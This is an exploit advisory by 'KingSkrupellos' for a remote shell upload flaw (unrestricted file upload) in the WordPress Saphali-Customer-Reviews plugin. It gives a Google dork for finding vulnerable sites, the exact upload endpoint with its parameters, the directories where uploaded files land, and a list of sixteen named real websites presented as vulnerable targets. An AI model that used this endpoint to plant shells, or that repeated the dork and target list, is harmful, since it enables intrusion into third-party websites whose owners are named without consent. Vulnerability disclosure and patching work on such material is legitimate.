################################################################################################# # Exploit Title : WordPress Saphali-Customer-Reviews Plugins 5.0.2 Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/12/2018 # Vendor Homepage : wordpress.org ~ saphali.com # Software Download Link : saphali.com/wordpress-plugin-reviews # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0.1 ~ 3.6.1 ~ 4.5.3 ~ 4.1.1 ~ 4.9.8 ~ 4.9.9 ~ 5.0.1 ~ 5.0.2 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/saphali-customer-reviews/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434- [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/saphali-customer-reviews/upload/index.php /wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce # Directory File Path : /wp-content/plugins/saphali-customer-reviews/images/...... /wp-content/uploads/..... /wp-content/uploads/[YEAR]/[MONTH]/...... ################################################################################################# # Example Vulnerable Sites => [+] bobakery.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] originoil.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] eraglonass.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] lcc.biz.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] teaonline.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] drozdpcp.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] podarkinovogodnie.by/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] taxi-duet.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] vedma-privorot.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] araprint.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] bestgarant.biz/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] savitarufa.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] vrukzak.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] royal-events.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] trenhard.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce [+] rumba-habana.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################